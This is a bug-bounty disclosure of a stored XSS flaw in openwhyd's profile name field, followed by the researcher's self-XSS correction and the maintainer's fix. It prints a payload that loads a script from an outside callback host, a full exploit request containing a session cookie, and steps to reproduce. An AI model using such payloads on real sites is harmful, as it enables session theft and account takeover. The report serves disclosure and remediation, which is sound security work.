Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd

Valid

Reported on

Oct 17th 2021


Overview

The openwhyd open-source application and openwhyd.org are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary JavaScript into the username setting on their profiles which, when the profile is visited by external users, would execute JavaScript in the victims' browsers. This is a serious vulnerability and should be triaged immediately to protect users.

Proof of Concept

Payload in browser: John Doe "><script src=https://securepoint.xss.ht></script>

Payload in request (URL-encoded): name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E

POST /api/user HTTP/2
Host: openwhyd.org
Cookie: _ga=GA1.2.1710874691.1634429460; _gid=GA1.2.32803653.1634429460; cookieconsent_status=dismiss; whydSid=s%3ACvqf3Q9bbgPSn9TFbSIW5MGlgKrRMxlb.anmicGodGtyIqzLo0BPEXz0c%2BbUxjqptLCOPopLBaQY; _gat=1; _dd_s=rum=1&id=93cf7abc-e858-4a40-bd8c-71ecaa2215b9&created=1634429459651&expire=1634432938003
Content-Length: 147
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://openwhyd.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://openwhyd.org/koassqwh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

name=john+doe%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fsecurepoint.xss.ht%3E%3C%2Fscript%3E&bio=&loc=&lnk_home=&lnk_fb=&lnk_tw=&lnk_sc=&lnk_yt=&lnk_igrm=

Steps to Reproduce

  1. Go to the user profile at https://openwhyd.org/[username].
  2. Click "edit profile", then "edit profile info".
  3. Enter the payload into the name field. This PoC uses an XSS Hunter payload to automatically receive a callback when the payload triggers. The payload used was john doe"><script src=https://securepoint.xss.ht></script>
  4. Save.
  5. Reload the profile, https://openwhyd.org/[username].
  6. The payload will execute.

The vulnerable component is the user profile badge and name field, located at the top right of the page.
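As an added illustration (not openwhyd's own code and not the fix later shipped in 1.45.5), the snippet below shows the sink the report describes: a user-controlled display name concatenated into the badge markup, where the quote and angle brackets in the reported payload close the attribute and open a script tag, next to the same template with HTML encoding applied at the sink. The function names `renderBadgeUnsafe`, `renderBadgeSafe`, `escapeHtml` and `containsScriptTag` are hypothetical, and the markup structure is assumed rather than taken from openwhyd.

```javascript
// Added example, not openwhyd's code. Demonstrates the stored-XSS sink from the
// report (display name inserted into profile badge markup) and its encoded form.

// Constructed sample input: the display-name payload quoted in the report.
const PAYLOAD_NAME = 'John Doe "><script src=https://securepoint.xss.ht></script>';

// Vulnerable pattern: the name is concatenated straight into HTML. The `"` in
// the name terminates the title attribute and `>` closes the tag, so the
// `<script>` that follows is parsed as real markup by the browser.
function renderBadgeUnsafe(name) {
  return '<a class="badge" title="' + name + '">' + name + '</a>';
}

// HTML encoding for text and double-quoted attribute context: every character
// that can change the HTML parser's state is replaced by its entity.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: identical template, but the name is encoded at the sink,
// so the payload is rendered as visible text rather than executed.
function renderBadgeSafe(name) {
  const safe = escapeHtml(name);
  return '<a class="badge" title="' + safe + '">' + safe + '</a>';
}

// Simple check used for verification: does the markup contain a script tag
// that the parser would honour (i.e. an unencoded `<script`)?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Encoding is specific to the output context; a name later placed inside a JavaScript string, a URL or a style attribute would need that context's encoding instead.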

Impact

This is a severe vulnerability. Malicious users can create profiles with embedded payloads, send links to target victims, and have their arbitrary JavaScript execute in the victims' browsers. Payloads could be crafted to steal authentication cookies and session information, such as whydSid, which could lead to complete account takeover.

We have contacted a member of the openwhyd team and are waiting to hear back. (2 years ago)
Tyler Butler
2 years ago

Researcher


I just noticed this is apparently a self-XSS: the payload executes on https://openwhyd.org/[user] only when that [user] is logged in. The vulnerable component is not used when a victim opens a vulnerable https://openwhyd.org/[user] profile, because the component is used as the "logged in" user's avatar. It's still likely the same logic was used elsewhere in the application.

Tyler Butler modified the report
2 years ago
Adrien Joly validated this vulnerability 2 years ago
Tyler Butler has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly
2 years ago

Maintainer


Thank you for reporting, Tyler, and for the precise explanation of the problem + steps to reproduce it! Would you be interested in submitting a fix through a pull request?

Adrien Joly marked this as fixed in 1.45.5 with commit 14e0d4 2 years ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE